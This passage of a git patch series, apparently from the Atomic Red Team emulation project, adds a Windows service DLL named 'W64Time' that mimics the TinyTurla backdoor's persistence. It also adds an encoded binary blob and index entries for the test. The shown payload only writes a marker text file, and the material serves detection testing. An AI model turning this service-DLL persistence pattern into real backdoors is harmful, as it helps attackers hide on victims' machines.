z^6LRcak>vE4zVL#j5zI_>LtM~@TGjsZa<@Rh;P*gwM(ie58iG^rm4s!f$F-!+vzw! z8r~26A_uHP$OL`LkTvN!iI|Imff^f$g}Hi3ptcLfA%t8pR#`AVSJSdk z(6bt&E#zKpp^j$cL`wl{( zc3;^21_CyNk{NaCw|fEs&n=K*?j97;ClCgQx4CaY2@E%Yz{z20^RJzCLCix?>;*nVm90dp^P}N)j58| zG*8(30+4uGjzpv0<^C;hT;??h!yS8CxQC8m?_XLl?0ax5#12IV?e*sCbMj%be96ou z=r)jYk)47MZ*nlmWb<|qLE2eZImZ~tSF~9hh}g=}g3Qx$7l=o_f5v8CXy2^ha4vZI zAC#Qt1UpX%d00I2=_1aY+d==XXPQC^yzVa-- zu+ExcK9kQrZmkH0mUi)}xL>uClEZ47Gi8z^sKIhskAcNvVG|bj}sgT|U(oyfLIN2@*jW@98 z5cNJO_nBZ%N0SijPSw+T+#uFd!4(-eKeD^S9 zGO!?2beKMY+dQ7{xe?P=Tv|R)tAz*ZA;n<@;6^W5?ba7-XMJ`hQg>S@-80r~!QsyySb2TMY>tZ;Zj{%Fn4GEvAB& zQXm^@>5M@Znh&z%GYj_^Xkpx_Mx2jvY9Bn%wI#1!pD_)GKDdQFldt923+ZkYck+=Qxinf5#-#DlEM@Ise=m>;2$Goc&_jM&Tr z?F+`Cy?v80RYhka^_npZEVQF#-Os85eGX?D*8mxEdMtNZAXr zJ%qEa@H_PGSZFMJn*nxEnEd%r-(^uRpWmhgrm&PzhMmxlO2ffNbpx9Z=tpyrJfY~i zF_6fiRt|gx6=!GM9uNj5=JVr;sn5qLJnz${4dy7rwm8V*0bQZ$dGuvoL6#-_QSZ}M ziThQFHmFRIZQc!~M!okSeKj~+q0%44CZlI{o!k&ZR@A%3!Z6m(5t%VpXoC1G9(aIL zE~y9JUy~^AePr05jr}7FH`d*t%92@yJAy-vviiaomJR4v_Upn=8u5ClGQ|xE9V3K- zH|>22oEar^DKLz;HRBC@kMtAtJCSspHd69{Dk>1AOIPGsjiZf}$D^VRh=U!Ffj7WT z%m!a`g-HZ>u4;_;llk z#*7`2BFuYsrK7S7L7^=dZX9#N^qex|NhJj;8#TAY-n<8xuhi5;$34p}>&>e<*Ocz`+9lEu8#A;5!0e7Wkw< zh39Sw-y|?1@Ej@oBMCPNbPH7V8Ytnx0+k#*5*{Y-V1ZtNhY1`mP|58m2|w@=Yj>N# z9|&v_xJ+QJz>5Ty2|P>SXo1HI^a>mx@Dn@|8O`kw_&b3w2;464VS#rF{Gq_Gz{>ASHp61X2=6NgySG zlmt=|NJ$_ifs_PN5=coPC4rO#z9I?4-#-}LlMJOJJ@-?eyhuA)wp3h70x1ckB#@Fo zN&+bfq$H4%KuQ8B38W;Dl0ZrVDGB^nN(isRONHm}o{ zypra}*VyFHB~GIH({VOk?)tUk0qLTRuB|w#i}QInxYvxci0klx?oYmv6m?ShCZ!iC zOOJXF!jn#28BCr(vH?7pAEb4qn>4=>*@OI1@0DPguCBB4t_T8a%+3L>5W$N8}^j zW^>=ASHqScO}512dUrxH3_u(T+KW^lKQ12kdi=30x1ckB#@FoN&^2W3Cu06uUh0F zmVZ5kLBlcEo*zSC)6Y8ZOV+=SZX7~r%InI zAO5nedj$Va|JWA!%m0e%Gqmu}q`Bh37obVr!HbDM0L z&MjJ6SzA{*&-NkI2lcc2e5F6?hWD-3J%V5B56?NtZ_feJn|n6gVMBdWZJ@S(2{76G z-&+3V+Q-H|mY;k6f(2F;-7wexa|HSXkP#&A7Dt*jG*oVK3);)q>>(93D);`jk zd%kmYr-?qZz+uC*FK189eJpQ}FXxswRW8LiLtW=C3|2PIr=Z&LM|o<~6+gB;?X&Rb zASoSx@Ar`&QT-=>wtZz;{O>RAxl^i_&23QqAKcir!NvFzAmejmy^W?#8b7DJv3_A==(+N#F- zruqc|-^|*kU}c?eS|B*Twtmi-{4rzZOsZeJIJl%Xuwu^4Npq&x*ViHcGz3SVI%;e_ z{-2S5+ML=YRdvDn)pM3Fu3lWXCm8#@u7@Z;mzz_lxl_s4YQSKwE*h znTVaEO-D*S$}0TRtk}`osoE%QEXpf*212JHcP+|SAvbAM<9<1CR^zW8T=iDJ&ec9n zuq_qNYk|*)P$Oy{6r4-I<#7o`ngWfrOBVV9_4U5G`XvivX}c}ESlWYKR8_`?{hDvF zvZIBTeV#Z>+0$t2I@hc2AGh$mX2rjFsEWVIN`Jz-f621%zgqY8mi^vf#n)MMTC8h~ z@ooYcOB8=Mb!s=vzQIuj_F6P``rKKkpE|vEarLOca%*CvS7YAkThLg)*cYg&_7w%{ z7uQz#rdH4QO|Pz8Jc{3~mESCUD(h6}zgFaJ$KvBcjrB_cc_;a*D(mV{s2(kKaYJB* zPsu-??`v!?ok_)sIzs<9+e;Jdx=}1YZo!U9^$WpkQt9X%5Z^jS zmEV1_y5`MQ*K+H+&bqc+SC>VASLfffKxNe;^a7Y|%$F9jw6d|5(+uBMBZVJ`~h>wk#oH|O)udb@AY_u3hGp~+is;XbIl%L84YF5fwsG+_VU*c`_ zB^Ivq&97aspt=!-k{}tC8S^>GYo0u|2&kF@@b{qKw3yBaWGe%ezQBrxYF`a?R4Ib5 zM1KH*pq5OAASN$>ULgqTk?cxUD(g=6t*8(BnxLe*`M$+i924y~)dw4^MCSCCLQ*Qt zyUGU29@Y`4_RXseunf?jUEheoOXcE*y6W*hU*@2JRW+53zAE1YUtX>61YiF0v(G-M zFmuqPn#v^$rN<)P`uWx1#pY`T1Y1|WO+Pf>>cTahs<&Md0(Q7t}YRIsr?>#ze z(b>Spkz5cwRfERyTCRBQkqGC4R@a{`2M$J;R4$IKq}uUi_49*pT2t&K$ZI4=0+zte z#^Om3S~@;=zHg+@G0;_diTO8-mSMd?Yfx@GI0rkqqsGkk;okO})s?pMw6$s36703Q zksfN^3T5Xp2Zgp6qu0e3FyfmaFsK-pJV&Ze4B0R6T9SZRtTRK}nWLmY21CthiUYR(c+%XSESpSB2NoeOI(v zX`=T?@EmsM*r|&b%(h;nf3{65Wptu>1rp zKmW>4zw)!M{NyWtoCi&Xf0%-nI~h4ktUSfYH6Jau&PLqnS_#iltBnMeCctGvbtL=` zy-qb^2p1w&jlxzSrVf}#${#uC4tFI|I4dIdv6#Je&N;Pu;rR{KOU|oaQL=m%c*6Y! z!Rp2pGb=H6P*K7u;wM3U)yOFK)3oz3o1CuA(uz>u5=dnhcwHtEBAqF?Q?t6R^Gwbb zFW+Q$=?Q%!HH3)CUUw%EV4QZN*zrOrPleGDB){A^3`&A%+ zKP$nR-|Qy8jYDXFH~Y80ylw>DcxffCav-a4;Iwf&ujF;PBhRe}@5Wz#FY`QGTbM;j(V~T_3CG! z6JAE~XX7W|{Mq>{y2)?1N#@;mTbia{nx>@gn5+WJh5dXul>tMI2mumY144>LpsTRc3!4c zz-HGWAJ+7fWle}@j1}=Pl(9heSIOmq7&(GZO zM(%d%pm;ntY~~b=nmTH_>>L)Cmd;sz`l)k@tLFt5&aw9q8|KebG>^rFf7HS;Dk=q2 z66jR|ZPq?`uNhMrQW8i>K%14V&XuG@k&-|%3Ahe+=N^3gP}fn~fQJ5@pyB7rcIRdv ze=y>PGz{)3?kIQeQO9Q^->`w%YE zWsnS?$DQjrevs>UtzSc$&9fDElrt_F-E8-1*<%lOozk0}la=iu?pTLRhfh%Ywc`dH z?2@yZPCXy%q@PTu$>NgHPo{%p`I5z1Wsh<4V&zM)kz}$>7MF}hvU+?Oo-G=-Y(=I$ z#3j@t8Qo;{uy{V!*~XI9t&efTt$ewbjT|@3rTw9qqwtD%agj-pZ8IlXd1y2C{*=q& zXQY##WOB9I%1CEhKG=QQ!DENI66DZVz9%R<9_`?1IVT?Y4L?WupT=WE=hf5ANl{v%OX{S248 z@s~CI?rg`3Gtf!mPi#MRqQfWnY@aZ}U2^cG zp{^NL8tveDRN%+T4qiv_cT%5QQJ+IK?MLZpbF{p)SKZoiY2U`*q4+yGN&ReJbDG1~ z+-Un6t8LhRi1i#^s`PuTB~xerYp3Np(qeuq2`<}yY~L+%Ow#tiW64pIvR$JcJjQ(G z1m%M#IApfl=06E8o2G3yLNkf(Z2csR-41oT5AAobYq-;=B=b>8@C~1+#-JruS?cea z@1gOD{t9kJ@DBVvj6bda(0ostmY1KFmX>}WBGO#V6^OvmucGv{Gt<`(OjC!~yVz={ zcAu;cwvCN**wLYD(zLB2v%F&v9D%>|p}RqGltzC5y7#56NK0={!{NSOX(scDN#v2V zA4{gM9^w*wdmr`CXZ>5g!?ttF_D?%*>``dX%D2(>Gem#!IYvTX&_lhGNy-lI zBn$ep=fh;6;$>Wf6T5x~;;-zo32mdV`n34%m2R>&l#E7_INRsjG^GAltNP<2^&i%$ z9P|8B^5lJni_4(T&r&|WA?*Vtvrg?M8J*Kn5OOYL`R;s1GW{%3<(hgbmsIXa^pAWp z-W*}IUE!lseI?EsTO8#aTO=FjB%v{Epi3M0T}`9hPFjnq=8XX?z+c+X-AZivX$`RV z{^**=q?Nmv|90H-I?uXJ#5L2UW%6p_bEUhqbl%%nJO5CZHk9$6{+efchUPhSfaV!9 zxPtXK)}5xg1N}AM-7c*Vf9t@7!~=AWa}DUH4VZ{IYrbUBjvbP&4f&sR%?+HpQTBEG z?Y7Gk@BD!h_W|PfIOG2`NMqdR{IlbMGFcpPCX`3M&a|YyVEfo~I90gq-5XrmU+`BG ziPxoboRpbo$?E@W?`*)My2?C$?j)f=Qw@j;_G?>U;T2mG+>vnyHkdzT9jVW2iLZa^h0#1#!6ju(ayHo zWwqA*y>rhb0}X|MJddk0&-3T^-gD1+?>X-|_uPBKoIAoXI=0L=@9AQji|WLgnrp1~ z%JiL!`8bIw>FzQk`+rtOuc2;78Tv2x$@Skj7W$8Fu=2{@4PQ4@KPnq<<-HU874#v! zE#-4%2RYtQfCLpSCPHb zmJQ@Z{CjMgF=4ct;2WzZ)QwRSDzO)paU|NLV>C&}dINnR?)Q9``*@_@W3woEb90U4 z?P6PVQs`_I^1VQKUNlNGV+Tg3NA*)%x6A=j-_Cc*k;q?GBF{savFXwMqdeIpbCevJ<2wddHh!7(+?P~#eOU8IjB=CUn(`54N6sk7{t zw#01FVaHmwe32SsOi(h%%4e{gj?-Yd(jrxAJgG`@`Eth}Tdc-bj#6W%N{>_inC(gL z<@oDu4vCLTGVsazyja^7ta;9}^wzIm?mzo9d*GoUO_aE>`7< zMXKDlP?cA@Rk^W1$upn$_Sh^());(_vGnZV81(Q=C!a}^Z0aoI&TM{{9+%dh!oP(G z{Ov~IIi3yW)AuEP66J+LzE87X(!b0TA{y=^-<^?9?)xDVv1f5k=6}lAknaG=CqLgr z=Cxx#x$iFJ=ev~o`q<9~uHo{D4pT2VQpa)Xoc+EI`}6&OPx}&oxzB|U2-uzNuY5z5Jj5Ua4n3Y2VlMy!Cx$885jpl20in+v5L9JO9W>UZ|4y zk^P0wPy|vRKYCr$70#-qtnD|m?`Sc3M~i8_qs0|Z_*|}&C@0H7kIhW6;f^!-ZkdzJ zFZGh8-@{}ds@UJSHC&vX! z&;h=%o`IKKWvCSCF1Q}8`vUJXgS)0vmbEGUA2U?V47SM=h0mfSixD!g}U=3LOw}{1Lz?BGw{aQh6>@Q9rmJi)S(|{kfOcnT0=R| z5s3qgqBioh!(Mb4pZzd{LgZ1kv;*xWPZTCmF>&sN1F}te2HNLPZ~Qyp7Sx8HG`w~$ z?ZQtK{^2@~OPoFP4D}3B?UaS~`5gOJ%EEh4JL}qd;bRM^4{cG`8)_BWOa3G*b@N?l z(jD+V^xHMm8NP+qk*91S-|IoE=ob%s1O>3u(6@*>Q_oKLDr)--`4=1NlPHNDg-@Ui zb{dw~aa?Q{ybE=5tR(zB3SgHlp^s1nd3s^_QsRK^hD&asA30VMK8@87I`! z4wI;#_V&ZXjf@9rJ6wAcZ6{AZeE-J{HA7+xZ$wGbqwo;gNqX5Q4D}Caog5dgLIz24GJUF(kiz8L>q!>?quW`fei+d^NzBz;*=<^?BqbR!LZLGkq;Fhwlr~r)x=v zcQrGX$e)HP%yA{2(1k9eK5p19+t{6OFDk|!fD;G4E%fxezAMu^j2bp?SU_$BluS< zh!rX&&I7Q#jk=M?1#d@v)GY}+R#H!CFRZ?WF@PO~Pa-$<8Gz&dkr;A5+TlXvqdp$E z9#!H$3HPBk>32A072|vr`QZX|7~2E8BppBf(DoVP$UI<&UQ|wcJG^)`?d7;`_yh_u z{s&;?t&DH#?}i6}esq{TY536RXbXNauzD?PYossWf1m_; z)aO|jgAURbdxxQZg6gr$?jTm{h$rn$!)ENL27d5f{7^RsY((?0qwuY-Fm9+r z=3fl;fq%spb`++On{zM&=Oj5t@G}7CchPs)z3_F^F2~wT{Lw+ihP~TRn^7&-h%~&a zhj|j)4Ie~qNr%5d_1NluLoGrc>?r&JnuzU4;ah~AgioLj?ELjbvi4}y*N6k_kA!EV z4($B(RI=9U9@I@);U=_8{J`8gs{FN2vIZ)*UP@TIm2(rH!ujYjY@r9au!YZ|I&9ZA z#tiDl?t~Ac`>^}rn`k?B*>*$CMZ2&)u>Jw&L+m8Hb_e4byB&TNrLoiS><78Wz_!CJ zXx`nV!?9myo+sS{Uq_=!w?D+(_%LG(yBD6dlQ~(^;apUQ?SWrLostJWg{r@ZPf34- z{9?nOpn2FCc*~=d#qNdU|Bd5P)&W0>&Lcev??Mx>lQ4}cu?OJq&mg({TPSu8-JJ_&7>Q zIxKpE^Bvm`uR%VJ<%R(i!j8hb&^qiS{5IMk^?{?Fq#v=%;52kQwi`Zc&pOAEE@d`WDx2vMA9n;=#6LZpqub?{Y-aU-Zr?^&O=dT5lbwc&uA^jd(mND#d?0#tf zE_IXq@TaH)I|Cp2cj8Zd)c1%b3Xt9odr&)e^l5Aq5I=DJGo1U_Y4~$gi=Bb%o+YM| z2Y&zioKx8Lw4uI^>ahpl`X6w+CyMMK?&HcB421NCC3Ve1bWGm;J;MSYSEZ{E+C#_ojs(0=R;ocbfKQ`m0! ziv#pG_P|TrZ~TODzMg)Ep`S8lu+wn$%d`>O@pD6c_#pAYZillE(H?B|C+2xH5!((g zMRv*mZkwt@dzfQAuopd#orb?d)8t;g%%&!zT5NgUL_O-|x)X&DqjKytd=pj5^=O<; zeH4{)J#|4JI>3A$h4-R~TnmzL4?2P^Yi1827xSmAzZ^TBV{%T(`bt?-IRjhhLeDH{)oTgc!IYHB=d01I~_G#|Y?9yDT8Poifrc1M2vrO}iKUwX6 zS@UVlM>V@OJ2h|797)^HMBayfYt{P=&FR0hwpVNJ)+~O*O0U&ir}?zzdH-YW_i1j| zd|A_e#MK8S2Lq|)gP>Ut(w1h-P-QfY|y+w^TpS! z{Tno2)8q9+y8X2}y;L*(-&Xz|ns;l4HAA}GyI!^ORcOxD3~Ao2xm|NWvovFs^JwnW zRNDUn%`?&WXTs;*Z(8lyqZ!q_Nprg92Q**Q{kBW9Tk|WLotj&9ew*f*sQYj}59{L( zx9`u9w&pD>USHMxhUPxa0nIlwm7X_BH79CTYPvMtnw}hW`AaoFpgCG|w&rVpwCZzE zbHCp(NN;|;V9(|DKu){-XzaecuY5ViiLiFjhSIB#4 zDBpUnYXOdNyiei!Y{jN$5dJ{@Sk3583#I-e5f8 zkLh=f%u2*UwcfCgAG(*H@qNv<*q_k5_)X+Q3qKNGRlT&zJ?FzyuaH-i@XNzar^DoT zmX`AV-g@6c$sx7K>!SXJ+?nOQAm@0A>p zmV_B;GGqLRy)-S@7B|qn^DtArQQmKBhIqI4+)kUEmo6{Rw;awRw!;!{FxYgAd z@%bBD6L|~V7uL+Qj&3V<2E#7iMPOxdRaY-D=QqTOqCeqsSq+xVwN*7$`FkV+Q%Dn1 zgX#}w?W$~4K341`CVyV1S4te?fnd|A`K{8G%~tR+E2fR!6Zu+9C(tcUgRx47Jk3vrC*Sg1$sxnEmElGSnPz zKSN}$IhQJ2DWg00LWGliA;cUR|9HPcM*j%QF41N8(sF--n9$YM+bvG=;1V3(aWWW9 z>hX(WXFS@HI0aW#Rkhhs_e;xz4CWD5Mgl40I2%m0q{!)S@HQ?Vsh>GCO3no7(`SiH zG!Z)u7uOd%qo?Pgo_3sOB~+YtG_)|Wj4-A$y6UsD>u!35>FbmnNHiS|Imf)Tg zel2Hxn2GRI>Y_U~ll2h{pN@}TWqo*Cy}{7PYr?E8bHW@($LaOUBCcHS@aeVW`mB%B zYsnvp#+)!$fUDW9F&8Dp^4;g}*L?Ya_YTbx;K#M8)pxnwhqR9Vx=0`bFy zcFKPAbo810`T2w|yUESWJ8aIzkl#Br0iCd<+;P;`nhUa5wCp*Xy$2ZVmXSCZU*b#z z{Ua%wojI50hCt*5?+D7?mEHhT?viSZnW ztZ4RzSB`k%woYrgrvISG$zA$8-ziUB>KMGKsZ#S7FP-I{Qt7D9K7{;}JS#NFYu$!k z&&GoSu4kxbe{*AWrBYXm)f{Q{tBaIr(zQd+3}$0Qa$Nkjbf2Hjj;vICkAGHMTU{U) zSy9v0=#M6Xk?ac@O-Y^|^EUhSBU7dP%nPYzJnC-@Ht|xjfb}fJTf2u%=P|;1bWxY+ zqYu8#%G5_ULp+};buRlGTVgSPIPYmkoi|)6?FlFRZ3%v8!ZceOV+nc8nIG}Bg#5F4 zN7@4Fdjog2$L_P*aD$qX+cPiX_00=5#JsVU@+`P?)}kc~>gLR^8H{^=iaEvVi&leo zakY9wL7y4*N@#etRBB2Ik>q(#ekt0V6-!h%EL-G{Mq&w7ZJ1mW=n#3?n#u5L^2f|* zBuEQladlI1Q)4I+_bU}FZpw~orEV^6qC}%wo@F!=SF4Mgb6ff-yg?N=R^O{!&GCjHF$X7YD}imdIWZ7&cqu(HMQ)#LnwV zBq+f!hfwzwnM@|j{ZVfsAm#eljz>emgii34tZ0mD|1H!@-Ye(J&HLEp^M=h*>Cn-_^JZ;8&<@vI3aV$3N&mpw~^u|$hEv?RPD z7^Y7BB}>BAwBQ@81Lq|{Q0mqa{@!xj-S)gTx?_<>e>|?fT2hybUM@+kqt$vN5}WPk z&o(iCuJwzG7q<9gE8YHBQzXW`-AF51%qBvmWt-jB2S6JDAeox@A{Zcw*LiZ%V@rWkdzq|M`Hmo@UoAEg!+Q8-#9 z(>G6vV$bGuQ|d{{r<)?FO8u-vhcnv@ewoXVoO+s4eYyNqJ|Er92)eFj(Sn+JxxZEo z|JThzY9RuJ2oxf4`VlbB=;!VAJEMoQoWK2`g_Pq)U`g50zoUKZcIUXG_g{a4?c*M( zu;c$h1Xw#kEm8Z?m1SK8365dX$MAbCwd{*dDN_0Gi9fo0VJjDb8P2xmkiC^hMIOno zo;>9W$7H)d%>TFr!^^IoyrgdS<^n6{&KNBxe#j=+P59z61(a@*7@$_A2s$s@^Wo7y(@ZQ8qO|E9LCyPvU74;UU25~_&6&+d zHuv41zJLGyZCl#6bZqI|qN1$NB2UMbzO5?Bx+&~VYItN*MVDuD@8+^@Pj_#(>T&dV ddX&9LO<=!DmL=^;N79v)jl!o8fxqqu{2z7pEtLQO literal 0 HcmV?d00001 diff --git a/atomics/T1543.003/src/W64Time.cpp b/atomics/T1543.003/src/W64Time.cpp new file mode 100644 index 00000000..b6c73e03 --- /dev/null +++ b/atomics/T1543.003/src/W64Time.cpp @@ -0,0 +1,98 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "pch.h" +#include +#include + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + +SERVICE_STATUS_HANDLE SvcStatusH; + +//Initialize Service_Status Structure serviceType and CurrentState values +SERVICE_STATUS SvcStatusS = +{ + //dwServiceType + SERVICE_WIN32_SHARE_PROCESS, + //dwCurrentState + SERVICE_START_PENDING, + //dwControlsAccepted + SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_PAUSE_CONTINUE +}; + + +DWORD WINAPI SvcCtrlHandler( + DWORD dwControl, + DWORD dwEventType, + LPVOID lpEventData, + LPVOID lpContext +) +{ + // Handle the requested control code. + + switch (dwControl) + { + case SERVICE_CONTROL_STOP: //Notifies Service it should stop. Should only return "NO_ERROR". Same action as Service Control Shutdown + case SERVICE_CONTROL_SHUTDOWN: //Notifies a service that the system is shutting down so the service can perform cleanup tasks. + //Manually set state to "SERVICE_STOPPED" After cleanup commands are run (none in this case) + SvcStatusS.dwCurrentState = SERVICE_STOPPED; + break; + case SERVICE_CONTROL_PAUSE: //Notifies a service that it should pause. + SvcStatusS.dwCurrentState = SERVICE_PAUSED; + break; + case SERVICE_CONTROL_CONTINUE://Notifies a service that it should Continue after pause. + SvcStatusS.dwCurrentState = SERVICE_RUNNING; + break; + case SERVICE_CONTROL_INTERROGATE: + break; + default: + break; + }; + + SetServiceStatus(SvcStatusH, &SvcStatusS); + + return NO_ERROR; +} + +VOID main_payload() { + using namespace std; + ofstream myfile; + myfile.open("C:\\ART_W64Time.txt"); + myfile << "Hello from the Atomic Red Team.\n"; + myfile.close(); + return; +} + +extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD dwArgc, LPCWSTR * lpszArgv) +{ + + SvcStatusH = RegisterServiceCtrlHandlerEx( + L"W64Time", + SvcCtrlHandler, + nullptr + ); + + if (!SvcStatusH) + { + return; + } + // Report initial status to the SCM + + SvcStatusS.dwCurrentState = SERVICE_RUNNING; + + SetServiceStatus(SvcStatusH, &SvcStatusS); + main_payload(); + +} From aeaded3b083ddaf23398b64f38282b5691054b91 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 2 Feb 2022 16:27:51 +0000 Subject: [PATCH 3/4] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1543.003/T1543.003.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1543.003/T1543.003.yaml b/atomics/T1543.003/T1543.003.yaml index 338b07ac..5e1f6018 100644 --- a/atomics/T1543.003/T1543.003.yaml +++ b/atomics/T1543.003/T1543.003.yaml @@ -92,6 +92,7 @@ atomic_tests: try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} catch {} - name: TinyTurla backdoor service w64time + auto_generated_guid: ef0581fd-528e-4662-87bc-4c2affb86940 description: | It's running Dll as service to emulate the tine turla backdoor diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 7aff52be..f27565b5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -850,3 +850,4 @@ c510d25b-1667-467d-8331-a56d3e9bc4ff deecd55f-afe0-4a62-9fba-4d1ba2deb321 d239772b-88e2-4a2e-8473-897503401bcc eb8da98a-2e16-4551-b3dd-83de49baa14c +ef0581fd-528e-4662-87bc-4c2affb86940 From 454ad2308db382b4276ee290ec6afb22b2fb434e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 2 Feb 2022 16:27:57 +0000 Subject: [PATCH 4/4] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/windows-index.md | 2 + atomics/Indexes/index.yaml | 60 +++++++++++++++++++ atomics/T1543.003/T1543.003.md | 51 ++++++++++++++++ 6 files changed, 119 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 7763acf2..62af702d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -266,6 +266,7 @@ privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscrip privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell @@ -699,6 +700,7 @@ persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Pe persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 0c26c68d..e924ef6c 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -171,6 +171,7 @@ privilege-escalation,T1546.003,Windows Management Instrumentation Event Subscrip privilege-escalation,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt privilege-escalation,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt privilege-escalation,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +privilege-escalation,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt privilege-escalation,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell @@ -464,6 +465,7 @@ persistence,T1546.003,Windows Management Instrumentation Event Subscription,1,Pe persistence,T1543.003,Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt persistence,T1543.003,Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell +persistence,T1543.003,Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f802d2c4..8c6277f2 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -455,6 +455,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] @@ -1158,6 +1159,7 @@ - Atomic Test #1: Modify Fax service to run PowerShell [windows] - Atomic Test #2: Service Installation CMD [windows] - Atomic Test #3: Service Installation PowerShell [windows] + - Atomic Test #4: TinyTurla backdoor service w64time [windows] - [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 21c0c29d..c33352ff 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -318,6 